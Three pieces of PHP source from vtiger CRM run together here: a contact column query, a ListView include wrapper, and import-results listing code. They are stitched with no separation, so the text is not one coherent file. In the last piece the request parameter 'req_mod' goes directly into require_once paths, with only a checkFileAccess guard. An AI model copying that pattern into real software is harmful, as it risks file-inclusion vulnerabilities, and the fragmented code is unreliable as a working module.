array($_REQUEST['record'])); $y = $adb->num_fields($result); for ($x = 0; $x < $y; $x++) { $columnNames[$x] = "CONTACT_" . strtoupper($adb->field_name($result, $x)); } $columnValues = $adb->fetch_array($result); for ($x = 0; $x < $y; $x++) { $columnValString[$x] = $columnValues[$x]; } $columnString = implode(",", $columnNames); $columnValString = implode(",", $columnValString);
<?php /*+********************************************************************************** * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. ************************************************************************************/ global $currentModule; checkFileAccess("modules/{$currentModule}/ListView.php"); include_once "modules/{$currentModule}/ListView.php";
$smarty = new vtigerCRM_Smarty(); $smarty->assign("MOD", $mod_strings); $smarty->assign("APP", $app_strings); $smarty->assign("IMP", $import_mod_strings); $smarty->assign("THEME", $theme); $smarty->assign("IMAGE_PATH", $image_path); $smarty->assign("MODULE", vtlib_purify($_REQUEST['req_mod'])); $smarty->assign("SINGLE_MOD", vtlib_purify($_REQUEST['modulename'])); $smarty->assign("CATEGORY", vtlib_purify($_SESSION['import_parenttab'])); global $limit; global $list_max_entries_per_page; $implict_account = false; $import_modules_array = array("Leads" => "Leads", "Accounts" => "Accounts", "Contacts" => "Contacts", "Potentials" => "Potentials", "Products" => "Products", "HelpDesk" => "ImportTicket", "Vendors" => "ImportVendors"); if (!empty($_REQUEST['req_mod'])) { $req_mod = $_REQUEST['req_mod']; checkFileAccess("modules/{$req_mod}/{$req_mod}.php"); require_once "modules/{$req_mod}/{$req_mod}.php"; if (!isset($import_modules_array[$req_mod])) { $import_modules_array[$req_mod] = $req_mod; } } foreach ($import_modules_array as $module_name => $object_name) { $seedUsersLastImport = new UsersLastImport(); $seedUsersLastImport->bean_type = $module_name; $list_query = $seedUsersLastImport->create_list_query($o, $w); $current_module_strings = return_module_language($current_language, $module_name); $object = new $object_name(); $seedUsersLastImport->list_fields = $object->list_fields; $list_result = $adb->query($list_query); //Retreiving the no of rows $noofrows = $adb->num_rows($list_result);